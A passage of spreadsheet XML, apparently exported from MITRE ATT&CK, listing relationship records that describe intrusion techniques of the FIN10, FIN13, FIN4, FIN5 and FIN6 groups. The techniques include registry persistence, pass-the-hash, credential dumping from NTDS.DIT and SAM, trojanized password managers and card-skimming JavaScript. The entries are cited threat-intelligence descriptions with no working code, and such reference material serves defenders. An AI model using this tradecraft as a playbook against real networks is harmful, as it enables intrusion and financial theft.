    <t>[FIN10](https://attack.mitre.org/groups/G0051) has established persistence by using the Registry option in PowerShell Empire to add a Run key.(Citation: FireEye FIN10 June 2017)(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--75b383eb-5483-4c44-a721-ee1cffa6edb7</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has used RDP to move laterally to systems in the victim environment.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>relationship--a48e7d01-012a-4336-9676-0f34e8501e22</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.(Citation: FireEye FIN10 June 2017)(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--8b3f374c-9f56-4493-8b85-72d0750d0c59</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has used Meterpreter to enumerate users on remote systems.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>relationship--3d602fec-cf94-4aa4-a4d9-cad286e6881f</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has relied on publicly-available software to gain footholds and establish persistence in victim environments.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>relationship--9292d1e2-562f-4cda-a5f4-4ed6406e8b78</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>relationship--d3b787ec-795c-481b-94e5-ff42dc56d79d</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has executed malicious .bat files containing PowerShell commands.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>relationship--4de4a09b-5727-4462-b288-23278e74634e</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has enumerated all users and their roles from a victim's main treasury system.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--ff16c592-9eae-4c27-97a5-444e148883cd</t>
  </si>
  <si>
    <t>06 October 2023</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has assigned newly created accounts the sysadmin role to maintain persistence.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--a94e85d8-62a1-43a2-8443-245bf61ec115</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has compressed the dump output of compromised credentials with a 7zip binary.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--cf401927-62cc-4b10-99c1-c48841054e1e</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has obtained administrative credentials by browsing through local files on a compromised machine.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--68e9977d-a765-45ad-91e9-42db7af8f990</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has used IISCrack.dll as a side-loading technique to load a malicious version of httpodbc.dll on old IIS Servers (CVE-2001-0507).(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--a9830f35-1ffa-46a3-b061-07148dd09753</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has injected fraudulent transactions into compromised networks that mimic legitimate behavior to siphon off incremental amounts of money.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--3a75d307-2fde-412e-b01e-8cb0e157e762</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has gathered stolen credentials, sensitive data such as point-of-sale (POS), and ATM data from a compromised network before exfiltration.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--fc5cf1ea-f46f-4527-a8b5-7317c4e61dee</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has leveraged default credentials for authenticating myWebMethods (WMS) and QLogic web management interface to gain initial access.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--0afa86ee-1253-4f15-87a8-abb46422313b</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has utilized `certutil` to decode base64 encoded versions of custom malware.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--d7702458-8b9d-49e8-a494-b5d87681f2c5</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</si>
  <si>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</si>
  <si>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relationship--16510fcf-70a0-4da5-9b80-f4772abca436</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</si>
  <si>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</si>
  <si>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relationship--4f5f1da9-9396-4b66-a67b-c08470924882</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has gained access to compromised environments via remote access services such as the corporate virtual private network (VPN).(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--10c4c857-59e6-4168-b2af-96b6609bdc76</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has used the Windows `dir` command to enumerate files and directories in a victim's network.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--f97798e2-ec1a-4cad-ab07-f61ef6cb8f78</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</si>
  <si>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</si>
  <si>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relationship--6affc901-7028-46ea-8d85-0e7d05ca9467</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has researched employees to target for social engineering attacks.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--56547ce9-04bc-4540-8865-69082bac4e63</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</si>
  <si>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</si>
  <si>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relationship--6523c653-4f85-425c-a891-6df522e8c841</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has downloaded additional tools and malware to compromised systems.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--779b1ed2-5ff6-408d-837e-571bbc4ecc4a</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has utilized a proxy tool to communicate between compromised assets.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--37e781a4-8ac2-49c9-956d-2c78a5cef3df</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has used `Ping` and `tracert` for network reconnaissance efforts.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--a4a03850-ad3e-4599-af58-5aa67c63fb93</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has logged the keystrokes of victims to escalate privileges.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--ee3648f7-1066-4a85-9652-2ce54fc7964a</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</si>
  <si>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</si>
  <si>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relationship--60077740-36a0-4fd6-8c07-0694143b722e</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has created MS-SQL local accounts in a compromised network.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--4248d8aa-eec4-4fd3-9707-ca1ed85bf5c5</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has utilized the following temporary folders on compromised Windows and Linux systems for their operations prior to exfiltration: `C:\Windows\Temp` and `/tmp`.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--eb63ea0a-1d2d-4d6a-9006-a60dacc035da</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has utilized tools such as Incognito V2 for token manipulation and impersonation.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--76b2e00d-78bb-4aea-a787-46289b8540ef</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has utilized custom malware to maintain persistence in a compromised environment.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--09e3c20a-eb8a-4731-9d9b-39f08cc2ecc7</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has used scheduled tasks names such as `acrotyr` and `AppServicesr` to mimic the same names in a compromised network's `C:\Windows` directory.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--5c6b16c7-9977-4d40-b0df-75eecf350298</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</si>
  <si>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</si>
  <si>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relationship--a53879ca-2185-42ea-84de-823878fb871d</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has masqueraded WAR files to look like legitimate packages such as, wsexample.war, wsexamples.com, examples.war, and exampl3s.war.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--f5ce003c-c220-4c19-a45f-b2e2a6e924e2</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN13](https://attack.mitre.org/groups/G1016) has replaced legitimate KeePass binaries with trojanized versions to collect passwords from numerous applications.(Citation: Mandiant FIN13 Aug 2022)  </t>
  </si>
  <si>
    <t>relationship--df6b68c8-17b5-45b9-8ad1-908c89074531</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has harvested the NTDS.DIT file and leveraged the [Impacket](https://attack.mitre.org/software/S0357) tool on the compromised domain controller to locally decrypt it.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--47f8da55-c38f-4cec-b1c6-241ecb3dd8b8</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has utilized `nmap` for reconnaissance efforts. [FIN13](https://attack.mitre.org/groups/G1016) has also scanned for internal MS-SQL servers in a compromised network.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--2a37062f-9174-47b3-8c1f-2e32db19db1e</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has executed net view commands for enumeration of open shares on compromised machines.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--c31ccdbd-e501-41cb-98d9-46cdff9be1c0</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has searched for infrastructure that can provide remote access to an environment for targeting efforts.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--b79256c4-9067-44ed-8e96-8b11a4c348e8</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has used the PowerShell utility `Invoke-SMBExec` to execute the pass the hash method for lateral movement within an compromised environment.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--8a86cd72-8386-4c75-8362-7b9020add12b</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has enumerated all users and roles from a victim's main treasury system.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--fcddadbd-d32b-4cc6-afd4-de3c8629f260</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has used PowerShell commands to obtain DNS data from a compromised network.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--3b02e08d-f6fe-4d7b-907d-e8c6534f9a98</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has utilized web shells and Java tools for tunneling capabilities to and from compromised assets.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--0d357a8d-c053-44f0-8777-0e8f8f7bc9a8</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has used Windows Registry run keys such as, `HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\hosts` to maintain persistence.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--9992c76b-149d-4842-80b5-dbd37f0369be</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has remotely accessed compromised environments via Remote Desktop Services (RDS) for lateral movement.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--aa2e1086-00f6-45f3-9159-72f2cfd50001</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has leveraged SMB to move laterally within a compromised network via application servers and SQL servers.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--5d5bda78-ea1a-4e73-b663-6105b77728bb</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has remotely accessed compromised environments via secure shell (SSH) for lateral movement.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--e76f8463-45ca-489b-86e8-ee854c2a0f71</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN13](https://attack.mitre.org/groups/G1016) has created scheduled tasks in the `C:\Windows` directory of the compromised network.(Citation: Mandiant FIN13 Aug 2022) </t>
  </si>
  <si>
    <t>relationship--3ca53c3c-ec7d-4453-a80f-2f3306358a2f</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has extracted the SAM and SYSTEM registry hives using the `reg.exe` binary for obtaining password hashes from a compromised machine.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--427594ef-614a-4e8e-a6ac-abccc0645ada</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</si>
  <si>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</si>
  <si>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relationship--3114ebc8-7dc2-4ee7-8aad-5b764f27a6d8</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</si>
  <si>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</si>
  <si>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relationship--3438e84b-4e73-434a-a699-15289a09d64c</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has used `netstat` and other net  commands for network reconnaissance efforts.(Citation: Mandiant FIN13 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--f6b88216-8142-4151-af2b-31257a3c2857</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</si>
  <si>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</si>
  <si>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relationship--72b81f9e-8760-4d46-9ed3-4b91b12f6299</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has used VBS scripts for code execution on comrpomised machines.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--a759cca5-d8f2-4704-88c1-df76a1a1625e</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has used HTTP requests to chain multiple web shells and to contact actor-controlled C2 servers prior to exfiltrating stolen data.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--860147c4-3eb8-4909-8a02-081e67347ba7</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</si>
  <si>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</si>
  <si>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relationship--2ddb50ab-4c8e-41e6-ba3f-d7718c66f0d5</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</si>
  <si>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</si>
  <si>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relationship--8d24d635-bc2e-48a2-87a0-01d8e10c62f2</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has utilized `WMI` to execute commands and move laterally on compromised Windows machines.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--e75c948b-7ce8-4872-a3c4-4a2b01828418</t>
  </si>
  <si>
    <t>[FIN13](https://attack.mitre.org/groups/G1016) has leveraged `WMI` to move laterally within a compromised network via application servers and SQL servers.(Citation: Sygnia Elephant Beetle Jan 2022)</t>
  </si>
  <si>
    <t>relationship--0f9b73b7-734d-4ceb-8a93-776652626c73</t>
  </si>
  <si>
    <t>G0085</t>
  </si>
  <si>
    <t>FIN4</t>
  </si>
  <si>
    <t>intrusion-set--d0b3393b-3bec-4ba3-bda9-199d30db47b6</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</si>
  <si>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</si>
  <si>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relationship--70a17629-6b01-4764-932b-8be576270329</t>
  </si>
  <si>
    <t>01 February 2023</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has presented victims with spoofed Windows Authentication prompts to collect their credentials.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>relationship--a568a6a5-860b-4fe1-9f00-ab6fbbb41a26</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has captured credentials via fake Outlook Web App (OWA) login pages and has also used a .NET based keylogger.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>relationship--8cb59548-2e8d-4635-809b-b9ba22c94c31</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has lured victims to launch malicious attachments delivered via spearphishing emails (often sent from compromised accounts).(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>relationship--59b6b000-c8c5-4b4a-8801-5102de111111</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has lured victims to click malicious links delivered via spearphishing emails (often sent from compromised accounts).(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>relationship--822c5044-906d-4c4f-b350-49471beb03a8</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has used Tor to log in to victims' email accounts.(Citation: FireEye Hacking FIN4 Dec 2014)</t>
  </si>
  <si>
    <t>relationship--50f68fb8-1e59-4b3a-b389-9c2797f4d347</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has accessed and hijacked online email communications using stolen credentials.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>relationship--e9267a72-00d7-438b-8c41-af72021e89d0</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</si>
  <si>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</si>
  <si>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relationship--c35e3d28-f9f2-4547-9927-7b734ebec54c</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has used spearphishing emails (often sent from compromised accounts) containing malicious links.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>relationship--a8e36e77-3899-4e7c-b27e-ab6ebf049066</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has used legitimate credentials to hijack email communications.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>relationship--073fd81c-b49a-4800-b73a-c1b3aba3aa54</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has used VBA macros to display a dialog box and collect victim credentials.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>relationship--0ef0077e-ee87-4e67-a466-2085a9148fc9</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) has used HTTP POST requests to transmit data.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>relationship--d26abf6d-069b-4b7b-b408-cf9065ebef92</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) scans processes on all victim systems in the environment and uses automated scripts to pull back the results.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--55ffbd77-ec97-4dca-9399-b9e4b62fbbf8</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) has has used the tool GET2 Penetrator to look for remote login and hard-coded credentials.(Citation: DarkReading FireEye FIN5 Oct 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--6b429676-7b77-4453-a6ce-2d6a6cb0dfe7</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) has cleared event logs from victims.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--9b43f780-6a8b-477f-826f-c45e867749c9</t>
  </si>
  <si>
    <t>relationship--39590383-ba69-4d8f-9520-e893cd4ebcdf</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) maintains access to victim environments by using [FLIPSIDE](https://attack.mitre.org/software/S0173) to create a proxy for a backup RDP tunnel.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--11f6ad22-0293-47bd-95d1-34bf4ee1de9e</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) has used legitimate VPN, Citrix, or VNC credentials to maintain access to a victim environment.(Citation: FireEye Respond Webinar July 2017)(Citation: DarkReading FireEye FIN5 Oct 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--9abd0448-a3b7-4262-8753-fe81dc91c434</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) uses [SDelete](https://attack.mitre.org/software/S0195) to clean up the environment and attempt to prevent detection.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--1ace08c6-0f1a-487d-92b2-6c61c2299270</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) scripts save memory dump data into a specific directory on hosts in the victim environment.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--2af3c673-c0c6-4246-aacc-984eb370e7b9</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) has used the open source tool Essential NetTools to map the network and build a list of targets.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--3ef6a3fb-0d59-4ba5-b2d0-dc32d547b74f</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</si>
  <si>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</si>
  <si>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relationship--7c240038-5599-418a-83e4-6d9962eee0bd</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment.(Citation: FireEye Respond Webinar July 2017)(Citation: DarkReading FireEye FIN5 Oct 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--e25b4146-2f52-4c5b-a1f8-3e868e767f84</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used has used Metasploit’s named-pipe impersonation technique to escalate privileges.(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--671cfed4-4809-4f53-a6b0-ff4da289e406</t>
  </si>
  <si>
    <t>Following data collection, [FIN6](https://attack.mitre.org/groups/G0037) has compressed log files into a ZIP archive prior to staging and exfiltration.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>relationship--98229d5a-fce3-442e-91cf-7ec7b7994248</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.(Citation: FireEye FIN6 April 2016)(Citation: Trend Micro FIN6 October 2019)</t>
  </si>
  <si>
    <t>relationship--0c78e3a7-45c5-454f-8905-a831fbede841</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) used the Plink command-line utility to create SSH tunnels to C2 servers.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>relationship--de840f88-b9d0-4f7e-b5c0-b666faa2d92f</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</si>
  <si>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</si>
  <si>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relationship--ac7d5b88-7929-4f64-abcd-8219caafac24</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN6](https://attack.mitre.org/groups/G0037) has used Comodo code-signing certificates.(Citation: Security Intelligence More Eggs Aug 2019)	</t>
  </si>
  <si>
    <t>relationship--a30f6573-061d-4df0-8c0d-0f6afc5fa96c</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used encoded PowerShell commands.(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>relationship--2c8ae921-219f-42ab-a4a4-5736ef0f8bf8</t>
  </si>
  <si>
    <t>08 October 2020</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--1f764874-0e08-4799-9487-a9e12c499c13</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>relationship--d2212e02-787a-4893-8ecd-d1ac6619bf9f</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used the Stealer One credential stealer to target web browsers.(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>relationship--f097444b-fa65-4457-943c-5061e29f9ef0</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has collected schemas and user accounts from systems running SQL Server.(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>relationship--23749a96-a086-4e14-b6c1-44bc9c7d99c1</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has collected and exfiltrated payment card data from compromised systems.(Citation: Trend Micro FIN6 October 2019)(Citation: RiskIQ British Airways September 2018)(Citation: RiskIQ Newegg September 2018)</t>
  </si>
  <si>
    <t>relationship--46389d22-1f4d-4597-b03d-30b9ec4146df</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has deployed a utility script named &lt;code&gt;kill.bat&lt;/code&gt; to disable anti-virus.(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--7107db7b-24f5-473e-9d01-ab858dcf3adc</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used Metasploit’s [PsExec](https://attack.mitre.org/software/S0029) NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>relationship--16c7058c-8fa5-4477-8332-9e76fcb38924</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has sent stolen payment card data to remote servers via HTTP POSTs.(Citation: Trend Micro FIN6 October 2019)</t>
  </si>
  <si>
    <t>relationship--b9349020-d0b1-4d48-94f1-74a4f3c79185</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</si>
  <si>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</si>
  <si>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relationship--74e737cf-67fb-4f80-ac4e-0ddff90b6f8e</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has removed files from victim machines.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>relationship--56682d47-48ad-4a8c-9f55-124f7cb90e5b</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used malicious JavaScript to steal payment card data from e-commerce sites.(Citation: Trend Micro FIN6 October 2019)</t>
  </si>
  <si>
    <t>relationship--31221040-295a-437a-ac4a-d85e0b5d9122</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN6](https://attack.mitre.org/groups/G0037) has used [Windows Credential Editor](https://attack.mitre.org/software/S0005) for credential dumping.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)	
</t>
  </si>
  <si>
    <t>relationship--e0bc7e9b-aec8-4e78-baed-f635ee7bd196</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used malicious documents to lure victims into allowing execution of PowerShell scripts.(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>relationship--862d150d-ea3c-439e-9a56-b877935e5262</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN6](https://attack.mitre.org/groups/G0037) has renamed the "psexec" service name to "mstdc" to masquerade as a legitimate Windows service.(Citation: FireEye FIN6 Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--87c11236-9f13-4179-aa6f-7b0fe9124a13</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN6](https://attack.mitre.org/groups/G0037) has used Metasploit’s [PsExec](https://attack.mitre.org/software/S0029) NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--56f53206-d15a-4b4d-8391-9d5dd5e0e403</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</si>
  <si>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</si>
  <si>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relationship--b1c49faa-0b6f-4a0e-85da-5ab8ddeab2ce</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used Metasploit Bind and Reverse TCP stagers.(Citation: Trend Micro FIN6 October 2019)</t>
  </si>
  <si>
    <t>relationship--d6cb7440-c39c-4bc2-b30e-5264a7f8753c</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has extracted password hashes from ntds.dit to crack offline.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>relationship--cef68296-665f-49ed-8a30-c91f8c00096f</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</si>
  <si>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</si>
  <si>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relationship--97ea3b82-58ba-4a3e-8e6d-367755f83fa6</t>
  </si>
  <si>
    <t>relationship--20c7d1a2-be94-4f58-83a9-7eb9e05c4449</t>
  </si>
  <si>
